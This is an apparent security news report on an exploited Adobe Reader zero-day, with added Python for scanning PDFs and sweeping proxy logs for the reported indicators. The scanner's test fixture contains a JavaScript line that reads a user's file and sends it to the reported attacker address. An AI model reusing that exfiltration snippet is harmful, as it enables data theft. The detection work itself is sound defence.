Recent research indicates that targeted attacks are being carried out through an as-yet unidentified vulnerability in Adobe Reader. According to the reports, this zero-day has been actively exploited since at least November 2025.
The attack is reportedly triggered as soon as a specially crafted PDF file is opened. One sample found on VirusTotal, named “Invoice540.pdf”, shows that the attackers use fake invoices as a social-engineering lure. Most concerning, the exploit is reported to work against the latest version of the software with no user interaction beyond opening the file.
The investigation also found that, once the file is opened, hidden and heavily obfuscated JavaScript runs. This code abuses two built-in Acrobat JavaScript APIs, util.readFileIntoStream and RSS.addFeed. In normal use these functions handle file reading and the management of web updates; by chaining them, the attackers read data from the compromised computer and transmit it to a remote server at 169.40.2.68.
This activity is only the initial stage of the attack chain: the collected system information and device fingerprint prepare the ground for subsequent stages, which may include remote code execution (RCE) and the bypass of built-in security mechanisms in order to obtain broader control over the affected system.
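Because the JavaScript is described as obfuscated, a scanner that only greps a PDF for the literal strings /JavaScript or util.readFileIntoStream will miss files whose names use #xx escapes, whose strings are hex-encoded, or whose code sits in a Flate-compressed stream. The following Python is an added example written for this page, not code from the original report or from the researchers it cites: it normalises those three layers and then looks for the indicators the report names (the two APIs and the address 169.40.2.68). The sample PDF it builds is constructed for the test and is not a real malicious document; the verdict tiers are this example's own choice.

```python
import re
import zlib

# Indicators taken from the report above: the two abused Acrobat JavaScript APIs and the remote address.
SUSPICIOUS_APIS = (b"util.readFileIntoStream", b"RSS.addFeed")
C2_IP = b"169.40.2.68"
# Dictionary keys that let a PDF run code automatically or on an event.
ACTION_KEYS = (b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch")


def decode_pdf_names(data: bytes) -> bytes:
    """Resolve #xx escapes so an obfuscated name like /J#61vaScript reads /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def decode_hex_strings(data: bytes) -> bytes:
    """Rewrite <hex> string objects as literal (...) strings so their content can be searched."""
    def repl(m):
        digits = re.sub(rb"\s", b"", m.group(1))
        if len(digits) % 2:          # PDF allows an odd digit count; the final digit is treated as x0
            digits += b"0"
        return b"(" + bytes.fromhex(digits.decode("ascii")) + b")"
    return re.sub(rb"<([0-9A-Fa-f\s]+)>", repl, data)


def inflate_streams(data: bytes) -> bytes:
    """Append the inflated body of every stream that carries a valid zlib header.

    The lookbehind stops 'endstream' from being mistaken for the start of a stream.
    decompressobj tolerates the newline before 'endstream'; streams that are not
    Flate-encoded raise zlib.error and are skipped rather than aborting the scan."""
    parts = [data]
    for m in re.finditer(rb"(?<!end)stream\r?\n(.*?)endstream", data, re.S):
        try:
            parts.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            pass
    return b"\n".join(parts)


def triage_pdf(data: bytes) -> dict:
    """Static triage: normalise the document, then report which indicators appear."""
    view = decode_hex_strings(decode_pdf_names(inflate_streams(data)))
    keys = [k.decode() for k in ACTION_KEYS if re.search(re.escape(k) + rb"\b", view)]
    apis = [a.decode() for a in SUSPICIOUS_APIS if a in view]
    c2 = C2_IP in view
    auto_js = "/OpenAction" in keys and ("/JS" in keys or "/JavaScript" in keys)
    # Auto-run JavaScript alone is common in benign forms; the API pair or the
    # address is what ties a file to the reported campaign.
    if apis or c2:
        verdict = "matches reported campaign indicators"
    elif auto_js:
        verdict = "auto-run JavaScript present; review manually"
    else:
        verdict = "no indicators"
    return {"action_keys": keys, "apis": apis, "c2_ip": c2, "verdict": verdict}


def build_sample_pdf() -> bytes:
    """Constructed test document (not a real sample): #-escaped action keys and Flate-compressed
    JavaScript calling the two reported APIs, the light obfuscation a scanner must see through."""
    js = (b"var s = util.readFileIntoStream('/C/Users/victim/Documents/notes.txt');\n"
          b"RSS.addFeed('http://169.40.2.68/feed?d=' + escape(s));")
    body = zlib.compress(js)
    return (b"%PDF-1.7\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
            b"3 0 obj << /S /J#61vaScript /J#53 4 0 R >> endobj\n"
            b"4 0 obj << /Length " + str(len(body)).encode() + b" /Filter /FlateDecode >>\n"
            b"stream\n" + body + b"\nendstream\nendobj\n"
            b"trailer << /Root 1 0 R >>\n%%EOF\n")


if __name__ == "__main__":
    print(triage_pdf(build_sample_pdf()))
```

Run it against a real suspect file with `triage_pdf(open(path, "rb").read())`. The scanner is deliberately regex-based so it also works on malformed files that a strict PDF parser rejects; the price is that other filters (LZW, ASCIIHex, ASCII85) are not decoded, so a "no indicators" verdict on a file with non-Flate streams is not a clean bill of health.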
In this campaign the attackers are operating against specific target groups. Analysis of the malicious documents shows that the PDFs were written in Russian and refer to news and events in the Russian oil and gas industry, so that the delivery emails appear legitimate and credible to the recipients.
This is not the first time Adobe Reader has faced a security issue of this nature; an earlier vulnerability, tracked as CVE-2024-41869, had previously been identified.
Although the vendor has been notified of the vulnerability, no official security update addressing it has been released at this stage. Users are therefore strongly advised to be extremely cautious when opening PDF files received from unknown sources. Network administrators in institutions and enterprises should closely monitor for indicators of suspicious traffic, block communication with the reported address 169.40.2.68, and in particular block outbound traffic whose HTTP headers contain the phrase Adobe Synchronizer, to prevent attackers from communicating with infected systems. Before enforcing the header rule, confirm in monitoring mode that it does not also interrupt legitimate Acrobat traffic.
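Before a blocking rule goes live, a responder usually wants to know which internal hosts have already talked to the reported address or sent the flagged header. The following Python is an added example, not code from the original report: it sweeps proxy log lines for the two indicators the report gives (the destination 169.40.2.68 and the phrase Adobe Synchronizer in the User-Agent header) and groups the hits by internal source so the output is a list of hosts to isolate. The log format, the sample lines, and the severity tiers are all assumptions made for this example; adapt the regular expression to your proxy's actual format.

```python
import re
from collections import defaultdict
from ipaddress import ip_address
from urllib.parse import urlsplit

C2_IP = "169.40.2.68"                 # remote server named in the report
BLOCK_PHRASE = "adobe synchronizer"   # header phrase the report recommends blocking (compared case-insensitively)

# Assumed log layout: timestamp, client IP, server IP, method, URL, status, quoted User-Agent.
LOG_LINE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) (?P<method>\S+) '
                      r'(?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$')

# Constructed sample lines for the demonstration; 10.20.x.x, 203.0.113.x and 198.51.100.x are private/test ranges.
SAMPLE_LOG = [
    '2025-11-14T09:12:03Z 10.20.4.17 169.40.2.68 POST http://169.40.2.68/feed 200 "Adobe Synchronizer"',
    '2025-11-14T09:12:05Z 10.20.4.17 169.40.2.68 GET http://169.40.2.68/c 200 "Mozilla/5.0"',
    '2025-11-14T09:13:40Z 10.20.4.22 203.0.113.9 GET http://example.test/rss 200 "Adobe Synchronizer"',
    '2025-11-14T09:14:10Z 10.20.4.30 198.51.100.7 GET https://www.example.com/ 200 "Mozilla/5.0 (Windows NT 10.0)"',
    'this line is corrupt and must not crash the sweep',
]

SEVERITY_RANK = {"none": 0, "medium": 1, "high": 2}


def parse_line(line: str):
    """Return the record as a dict, or None for a line that does not match the layout."""
    m = LOG_LINE.match(line.strip())
    return m.groupdict() if m else None


def host_is_raw_ip(url: str) -> bool:
    """True when the URL addresses a bare IP instead of a hostname, which update clients rarely do."""
    try:
        ip_address(urlsplit(url).hostname or "")
        return True
    except ValueError:
        return False


def classify(rec: dict) -> list:
    """Return (severity, reason) findings for one record. Tiers are this example's own choice."""
    findings = []
    if rec["dst"] == C2_IP or urlsplit(rec["url"]).hostname == C2_IP:
        findings.append(("high", "destination is the reported C2 address"))
    if BLOCK_PHRASE in rec["ua"].lower():
        if host_is_raw_ip(rec["url"]):
            findings.append(("high", "flagged User-Agent sent to a bare IP rather than a hostname"))
        else:
            findings.append(("medium", "User-Agent carries the phrase the report says to block"))
    return findings


def triage(lines) -> dict:
    """Group findings by internal source address; malformed lines are skipped, not fatal."""
    hosts = defaultdict(lambda: {"severity": "none", "reasons": set(), "events": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        findings = classify(rec)
        if not findings:
            continue
        entry = hosts[rec["src"]]
        entry["events"] += 1
        for sev, reason in findings:
            entry["reasons"].add(reason)
            if SEVERITY_RANK[sev] > SEVERITY_RANK[entry["severity"]]:
                entry["severity"] = sev
    return dict(hosts)


if __name__ == "__main__":
    for src, info in sorted(triage(SAMPLE_LOG).items()):
        print(src, info["severity"], info["events"], sorted(info["reasons"]))
```

The medium tier exists because the report only says the phrase appears in the attackers' traffic; a host sending that header to a hostname rather than a bare IP deserves a look but not automatic isolation, whereas any contact with 169.40.2.68 is a direct match on the published indicator.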